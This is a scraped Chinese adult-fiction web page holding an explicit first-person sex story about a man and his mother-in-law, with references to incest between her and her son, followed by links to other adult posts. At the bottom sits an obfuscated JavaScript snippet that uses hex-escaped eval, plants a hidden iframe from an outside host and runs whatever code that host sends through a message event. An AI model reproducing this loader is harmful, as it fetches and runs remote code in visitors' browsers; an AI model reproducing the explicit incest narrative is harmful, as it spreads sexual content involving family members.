  我想起嶽母要認我做兒子的話,我感到情況非常不妙,接下來嶽母提出和她發生性關係應該是情理之中的事。
  我該怎樣應對呢?我從心裏還是看不上嶽母這樣的老女人,我老婆本身就比我年齡大,現在又去上一個比老婆年齡更大的女人,況且她還是老婆的媽媽,上這樣的老女人絲毫不會有任何新鮮感。
  如果命中注定我必須上一個老女人,並且能讓我選擇是親媽還是嶽母的話,我肯定會選擇親媽的,我情願把我的「第二春」奉獻給我的親媽,而不是嶽母,現在的處境,這樣考慮問題又有什幺用處呢?我處於進退兩難的地步,我該怎幺辦呢?現在隻有走一步看一步了,隻能聽天由命了。
  解鈴還需係鈴人,我應該把這個難題交給老婆去解決,她是這個家裏實際上的一把手,我必須想辦法把今天要在嶽母家休息這件事告訴她,既使老婆回來後知道了我做了不應該做的事,她也不好說我什幺,因為在嶽母家裏休息是經過她批準的。
  突然,嶽母敲門說有我電話。
  我趕緊用浴巾擦乾淨身體,穿上短褲來到客廳。
  嶽母說是我的手機有電話。
  我拿起手機一看是老婆的號碼,我趕快把電話打過去。
  老婆在電話裏說,弟弟剛才已經給她打了電話,說咱媽今天已經與弟弟那個了,咱媽今天不會有性方麵的要求,讓我安心在小舅子的房間休息,不會有事的。
  老婆的話讓我哭笑不得,這不是把我往虎口裏送嗎?
  當著嶽母的麵我又不好與老婆在電話裏說什幺。
  嶽母說讓我去休息,她準備去洗澡了。
  我從客廳裏的沙發上抓起我的衣服,來到小舅子的臥室裏,我把門關上,準備備把門插上,又一想:「現在這種狀況,插不插門又有什幺實際意義呢?」我躺在小舅子的床上突然想起嶽母今天說的一句話,她不會強迫我做其他任何事情的。
  這時嶽母推門進來,說我晚上肯定沒有刷牙,給我拿了家裏的備用牙具,叫我去刷牙。
  我起身從嶽母手中接過牙具到衛生間去刷牙。
  刷完牙,我又回到小舅子的床上。
  我打開床頭櫃上的台燈,找了一本雜誌看了起來。
  大約過了半個小時,嶽母又推門進來,說是一個人睡覺害怕要我陪她。
  我回頭一看。
  嶽母一絲不掛,沒有等我表態,就自己上了床。
  嶽母有些等不及似的,馬上撲到我的身上,用雙手緊緊的抱著我的腰。
  她在我右耳邊小聲的對我說:「好女婿,你跑不了,你不讓我滿意,我不會放過你的。」「你剛才說過,不會強迫我做任何事情。」
  「剛才是剛才,現在是現在,傻女婿,女人說的話,你也敢相信。本來我並沒有打你的主意,是你中午壞了我和你弟弟的好事,沒有讓我過上癮,現在我的癮上來,你必須讓我過癮。」事已至此,我已經沒有辦法擺脫嶽母的糾纏了,隻能就範。
  「我們隻能有今天一次。」
  「那就要看你的表現了,看你能不能讓我一次性的過足癮。」嶽母用手伸進我的短褲抓住我的肉棒說:「女婿是假斯文,肉棒已經12點了。」「好吧,我聽弟弟說過你的愛好,就按照你的愛好自己先上吧。」嶽母迅速地把我的短褲脫下來扔在地板上,順勢坐在我身上,把屁股抬起來。
  我用雙手小心翼翼地將我的肉棒放進嶽母的小穴裏。
  嶽母立即坐了下來進行上下抽動,兩個大奶子隨著抽動在甩動。
  我起身用雙手去抓住了兩個大奶子。
  我感到嶽母的小穴比老婆的小穴要大要深些。
  她邊抽動邊叫起來了:「太舒服了,女婿的肉棒真棒,真好吃,比海鮮還鮮。」嶽母在我上麵抽動了大約有二十幾分鍾,可能是感到累了,就爬到我身上對我說:「好女婿,你就像平時玩你老婆那樣玩玩我吧,讓媽也享受一次你老婆的待遇。」嶽母從我身上下來後,麵向上躺在床上。
  我翻起身,心想一不做二不休,半個月沒有沾女人了,剛才又被嶽母主動玩了,現在就把嶽母當作女人發泄一次性慾。
  我按照平時老婆最喜歡的姿勢爬到嶽母身上,把肉棒塞進嶽母的小穴裏,左手摸著嶽母的大奶頭,右手摸著嶽母的屁股,把舌頭伸出嶽母的嘴裏。
  嶽母抬起雙腿夾住我的腰部,雙手抱著我的頭,瘋狂配合著我。
  我用足力氣用肉棒抽插著嶽母的小穴,抽插了一百多下,喘著粗氣,將一股火熱的精液射入了嶽母小穴的深處。
  之後,嶽母癱軟在我的身邊嬌喘著。
  我親吻著嶽母,手摸著她的大奶子,和她一起享受著那甜美的餘韻。
  嶽母顯然對我的表現是非常滿足。
  突然,小舅子臥室的門被打開,進來了一個人,我回頭一看是小舅子,我不知所措。
  小舅子若無其事的說:「輸了錢,回來取點本錢。姐夫,媽,你們繼續玩。
  」
  小舅子從抽屜裏拿了一疊錢,揚長而去。
  字節數:28973
  
【完】

上一篇:Sena Nagakura永倉せな_[58P] 下一篇:玩了個大奶女主播
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u,r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('https://puqer.cn','/cd/104_m/162',window,document)};